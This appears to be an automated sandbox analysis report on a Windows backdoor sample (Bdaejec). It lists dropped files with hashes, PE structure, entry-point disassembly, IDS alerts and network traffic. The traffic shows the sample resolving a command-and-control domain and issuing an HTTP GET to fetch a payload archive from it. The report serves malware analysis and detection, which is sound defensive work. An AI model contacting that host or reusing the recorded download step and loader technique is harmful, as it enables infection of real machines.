                              SHA-512:BF73801E7B7096E781C2E509891EF65CF62181F771EFF1C3329BA70DE54984C911A1629A5CCEFA14B05CF8D94B5992D995B743498507B0F128F33C432BE4165E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):31744
                              Entropy (8bit):6.366381662938833
                              Encrypted:false
                              SSDEEP:768:uWQ3655Kv1X/qY1MSd3BQGPL4vzZq2o9W7GsxBbPr:uHqaNrFd3mGCq2iW7z
                              MD5:D0A2FED6900F1E4B15FF8D044F2D48C6
                              SHA1:22779304560CF2B40E910C6223DD192395AF7761
                              SHA-256:A0C8C928252B0BC0E82171BADDAA9D846C670B397F072F414B48967EE78407CA
                              SHA-512:BD3779B8A4835E5522B4CFCD995B856696DF381B5BE4FA4458CF4CE47581EDAAF82C137ABCBE33B06E8E179AF8FA6CAC44FF0BD71E4CB1C96258C2C745853981
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.9898535710403806
                              Encrypted:false
                              SSDEEP:96:aMFAQwsxhnj7afzQXIDcQBDc6BU5cEscw3QtX+HbHg/5ksS/YyNl1zWzkMsIqLOZ:TqQwq0rm52Mt8jk/gmzuiFHZ24IO8FY
                              MD5:C8B0703E22CB5C4E13997CE2B97013FA
                              SHA1:4FA4A9EDBACF2686BFE2C159D6398FB8E7AAD0B5
                              SHA-256:011F05F450380111FABE261E56E24009C5471341222C308071EBC73D01FEFE3E
                              SHA-512:5CE5ECA9C202F0D5F841F730F3CB647DAADD0BDB2AE8E47B36DCDD1D3F11E6A1B8A985C048018DF340414724D4C52C795AF24B184B953AEB27A83047271819E7
                              Malicious:false
                              Reputation:low
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.7.6.1.8.3.7.2.9.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.7.6.2.3.9.9.7.8.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.b.9.7.3.2.7.-.d.e.4.1.-.4.7.3.e.-.9.b.7.b.-.5.7.a.0.5.6.3.d.5.b.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.a.7.b.5.b.7.-.9.f.a.b.-.4.9.7.6.-.b.6.d.0.-.c.c.b.3.0.e.6.0.e.1.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.h.w.m.J.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.4.-.0.0.0.1.-.0.0.1.4.-.8.5.d.8.-.9.6.4.3.1.b.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.5.d.a.5.d.5.e.3.8.2.0.b.1.9.4.2.7.7.a.f.7.8.d.a.b.5.b.0.3.3.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.l.h.w.m.J.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Sat Dec 28 11:26:02 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):150366
                              Entropy (8bit):1.8749355834507835
                              Encrypted:false
                              SSDEEP:768:uXboe5QmdUxtGsG2jjG2+6G16lkBqpfJ/9/RfF/5fpVes+:uL0DJu2ZG16yqpfJ/9/RfF/5fpVes+
                              MD5:CD040C44D6C9625017F3966EED7C94EC
                              SHA1:B61CC7050B72D86AAF439C815A939821320A2E34
                              SHA-256:D12892B025629FC63EC57A3533B343F527121EE49B690C0BE16C60CBBC89A353
                              SHA-512:7C359FBD8F857064BEEE1BA82748882CD1CE6B4018F6555708B31D0F3DE268361274FB9A498FD64969004F668CA4EF373DA4D459C0BA596178998280C49A786F
                              Malicious:false
                              Reputation:low
                              Preview:MDMP..a..... .......J.og............D...............L...........lN..........T.......8...........T............;..v............ ..........."..............................................................................eJ......t#......GenuineIntel............T...........E.og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6268
                              Entropy (8bit):3.7233223519384895
                              Encrypted:false
                              SSDEEP:96:RSIU6o7wVetbsH6BqYWp0AUr0u5aMQUM89bPJnNsf39Jnm:R6l7wVeJsH68YWOrpDM89bRNsf37m
                              MD5:019167492AA36061E511C3B29167B807
                              SHA1:6AA32BF60D5409202B21B9478896C38A29663068
                              SHA-256:43B4A8D04F16E2DCFFE5981F5CA9AA7AD13364B1864ECA7F9B7C1AA398A4AF7E
                              SHA-512:EFE34DB4A1A2155E986E09CEEA52C65EA7E024CD8B986A757503350FD7BA9C4CFA7AF225464458E17EDB7E784E2A4F03279C191AECFDAAEA278DC1D19069A061
                              Malicious:false
                              Reputation:low
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.5.2.<./.P.i.
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4551
                              Entropy (8bit):4.444973637391193
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zssJg77aI9meSWpW8VYIYm8M4JMHFjUc+q8kAJmzCgk6Md:uIjfqI70ez7V8J0Uc2UCg1Md
                              MD5:72D740B31AB3BCC52CA6002DA2E3977B
                              SHA1:E901B7AA763FB9A42764ECB8D9BF34C60B88CA7E
                              SHA-256:9DBCEBAF90DFC70145287A6F52DB3194C21742795D14E754BAD335290BABB549
                              SHA-512:4EBBBB7BF9B82EC718148E211801D9688ADF5210465537315DFC2BACCBC45E8A3109DBB170EC3FE86B4F5B9F62CC5F0D5A5F0D596674E2A16FEB4B6423CADFF0
                              Malicious:false
                              Reputation:low
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651028" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):4
                              Entropy (8bit):1.5
                              Encrypted:false
                              SSDEEP:3:Nv:9
                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                              Malicious:false
                              Preview:foo.
                              Process:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              File Type:ASCII text
                              Category:modified
                              Size (bytes):4
                              Entropy (8bit):1.5
                              Encrypted:false
                              SSDEEP:3:Nv:9
                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                              Malicious:false
                              Preview:foo.
                              Process:C:\Users\user\Desktop\ArjM1qx3hV.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):15872
                              Entropy (8bit):7.031113762428177
                              Encrypted:false
                              SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                              MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                              SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                              SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                              SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 97%
                              Joe Sandbox View:
                              • Filename: aRxo3E278B.exe, Detection: malicious, Browse
                              • Filename: yRc7UfFif9.exe, Detection: malicious, Browse
                              • Filename: gT6IitwToH.exe, Detection: malicious, Browse
                              • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                              • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                              • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                              • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                              • Filename: ib.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                              • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.417095092518612
                              Encrypted:false
                              SSDEEP:6144:9cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNO5+:Ki58oSWIZBk2MM6AFBoo
                              MD5:787D98BA2A00C810CBC5B98177BC2C56
                              SHA1:5BF864B86A766A75802391FD74D5F3F75C33DCE5
                              SHA-256:13B435E6545196C323C4D6817FA0991C4964066362A0FB50B069D82A271F1E52
                              SHA-512:052DD212CAC31E5A5D980581C4008647DCF51366E7A25558D949A2BB4628A024EC0FA2E2DB0077F1E4AF2B6D2CC2AEE62FD9C84377CCFA5538EF6CC4E5324917
                              Malicious:false
                              Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.F.D.Y..............................................................................................................................................................................................................................................................................................................................................{..p........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\ArjM1qx3hV.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):61
                              Entropy (8bit):4.724021919949168
                              Encrypted:false
                              SSDEEP:3:RVAL2wO0naRRkxiMVZv:zbPcSRkHR
                              MD5:4D947906BC153FDBB21240C1F4187F5C
                              SHA1:D92D54040AC554897CBC796535BB53F193153CE1
                              SHA-256:C556180C2AEFE01E639BC51E3791C416E7BCC0384A699D2E4BDA1A2EB992D234
                              SHA-512:B84589CCE8A2B255F4319DA1DC069E08BC50CAC4D3C6459EAFA5B37313A6859A85694F0598D9E5C76DC0FF882614518505EEDFF5F01B1FCD82950FFAD5218F36
                              Malicious:false
                              Preview:Cannot open C:\Users\user\Desktop\ArjM1qx3hV-script.py..
                              File type:PE32 executable (console) Intel 80386, for MS Windows
                              Entropy (8bit):6.568590829740248
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:ArjM1qx3hV.exe
                              File size:82'432 bytes
                              MD5:3840cfa13afb95c493fc98d766946229
                              SHA1:745322beeaaf28197f3949b5ee30929f827177e1
                              SHA256:4feaa17c9b4a297a1fd51843a7f514d99c749a19bf46ab2968b48c6ccbd1d327
                              SHA512:3b51d82d1d2d2cbd2b49f638d807cc677fdb2a723b835872ac270dd0cb54cdef155ad4f8181618c7ecadb7d0f9d1abfa79332d32f0da1e0495ccbfe41e1f8c59
                              SSDEEP:1536:RfnLq01weW5yX3jFxv49Nu4GhQ6dGCq2iW7z:Y3ysTGhQiGCH
                              TLSH:0D839E61B980C073C44A2076441DC7B19F7BBC312675D997BB960FBB5F313D1EA2A24A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YS.j.2.9.2.9.2.9:..9.2.9.2.9F2.9.}.9.2.9.`.992.9.`.9.2.9.`.9m2.9.`.9.2.9Rich.2.9................PE..L......Q...................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x414000
                              Entrypoint Section:ltu
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows cui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x518BB0F8 [Thu May 9 14:21:44 2013 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:0f049ce24e217892c1b7f2d56270827d
                              Instruction
                              push ebp
                              mov ebp, esp
                              sub esp, 0000016Ch
                              xor eax, eax
                              push ebx
                              push esi
                              push edi
                              mov dword ptr [ebp-24h], eax
                              mov dword ptr [ebp-10h], eax
                              mov dword ptr [ebp-14h], eax
                              mov dword ptr [ebp-08h], eax
                              mov dword ptr [ebp-0Ch], eax
                              mov dword ptr [ebp-20h], eax
                              mov dword ptr [ebp-18h], eax
                              mov dword ptr [ebp-48h], 6D77686Ch
                              mov dword ptr [ebp-44h], 652E584Ah
                              mov dword ptr [ebp-40h], 00006578h
                              mov dword ptr [ebp-3Ch], 00000000h
                              call 00007FC0A8AFFC65h
                              pop eax
                              add eax, 00000225h
                              mov dword ptr [ebp-04h], eax
                              mov eax, dword ptr fs:[00000030h]
                              mov dword ptr [ebp-28h], eax
                              mov eax, dword ptr [ebp-04h]
                              mov dword ptr [eax], E904C483h
                              mov eax, dword ptr [ebp-04h]
                              mov dword ptr [eax+04h], FFFEE376h
                              mov eax, dword ptr [ebp-28h]
                              mov eax, dword ptr [eax+0Ch]
                              mov eax, dword ptr [eax+1Ch]
                              mov eax, dword ptr [eax]
                              mov eax, dword ptr [eax+08h]
                              mov ecx, dword ptr [eax+3Ch]
                              mov ecx, dword ptr [ecx+eax+78h]
                              add ecx, eax
                              mov edi, dword ptr [ecx+1Ch]
                              mov ebx, dword ptr [ecx+20h]
                              mov esi, dword ptr [ecx+24h]
                              mov ecx, dword ptr [ecx+18h]
                              add esi, eax
                              add edi, eax
                              add ebx, eax
                              xor edx, edx
                              mov dword ptr [ebp-30h], esi
                              mov dword ptr [ebp-1Ch], edx
                              mov dword ptr [ebp-34h], ecx
                              cmp edx, dword ptr [ebp-34h]
                              jnc 00007FC0A8AFFDAEh
                              movzx ecx, word ptr [esi+edx*2]
                              mov edx, dword ptr [ebx+edx*4]
                              mov esi, dword ptr [edi+ecx*4]
                              add edx, eax
                              mov ecx, dword ptr [edx]
                              add esi, eax
                              cmp ecx, 4D746547h
                              jne 00007FC0A8AFFCB4h
                              cmp dword ptr [edx+04h], 6C75646Fh
                              jne 00007FC0A8AFFCABh
                              Programming Language:
                              • [IMP] VS2005 build 50727
                              • [C++] VS2008 build 21022
                              • [ASM] VS2008 build 21022
                              • [ C ] VS2008 build 21022
                              • [LNK] VS2008 build 21022
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xf92c0x28.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf4880x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xe0000x140.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xc95d0xca00aa49640fd565219199147ca08c770c9fFalse0.6125077351485149data6.611198890587402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0xe0000x20600x2200e6a22fa467dcc8fa37fe596c800e97d3False0.349609375OpenPGP Secret Key5.292564857150331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x110000x2bc40x1000a778d492addf655755149a8778623a20False0.209228515625data2.2523233306733843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              ltu0x140000x50000x4200feb9033b0b9614a9cff88ba9c5a53319False0.7771661931818182data6.933946275224043IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              DLLImport
                              KERNEL32.dllGenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-28T12:25:58.540130+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.7650671.1.1.153UDP
                              2024-12-28T12:25:59.786722+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.74969944.221.84.105799TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 28, 2024 12:25:58.685000896 CET49699799192.168.2.744.221.84.105
                              Dec 28, 2024 12:25:58.804615974 CET7994969944.221.84.105192.168.2.7
                              Dec 28, 2024 12:25:58.806278944 CET49699799192.168.2.744.221.84.105
                              Dec 28, 2024 12:25:58.806461096 CET49699799192.168.2.744.221.84.105
                              Dec 28, 2024 12:25:58.925986052 CET7994969944.221.84.105192.168.2.7
                              Dec 28, 2024 12:25:59.786653042 CET7994969944.221.84.105192.168.2.7
                              Dec 28, 2024 12:25:59.786721945 CET49699799192.168.2.744.221.84.105
                              Dec 28, 2024 12:25:59.786751032 CET7994969944.221.84.105192.168.2.7
                              Dec 28, 2024 12:25:59.786806107 CET49699799192.168.2.744.221.84.105
                              Dec 28, 2024 12:25:59.790950060 CET49699799192.168.2.744.221.84.105
                              Dec 28, 2024 12:25:59.910603046 CET7994969944.221.84.105192.168.2.7
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 28, 2024 12:25:58.540129900 CET6506753192.168.2.71.1.1.1
                              Dec 28, 2024 12:25:58.677571058 CET53650671.1.1.1192.168.2.7
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 28, 2024 12:25:58.540129900 CET192.168.2.71.1.1.10xeab3Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 28, 2024 12:25:58.677571058 CET1.1.1.1192.168.2.70xeab3No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                              • ddos.dnsnb8.net:799
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.74969944.221.84.1057996052C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              TimestampBytes transferredDirectionData
                              Dec 28, 2024 12:25:58.806461096 CET288OUTGET /cj//k1.rar HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: ddos.dnsnb8.net:799
                              Connection: Keep-Alive


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:06:25:56
                              Start date:28/12/2024
                              Path:C:\Users\user\Desktop\ArjM1qx3hV.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\ArjM1qx3hV.exe"
                              Imagebase:0x400000
                              File size:82'432 bytes
                              MD5 hash:3840CFA13AFB95C493FC98D766946229
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:06:25:56
                              Start date:28/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff75da10000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:06:25:57
                              Start date:28/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\lhwmJX.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
                              Imagebase:0xbc0000
                              File size:15'872 bytes
                              MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 97%, ReversingLabs
                              Reputation:moderate
                              Has exited:true

                              Target ID:9
                              Start time:06:26:01
                              Start date:28/12/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520
                              Imagebase:0xc10000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:8.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:85
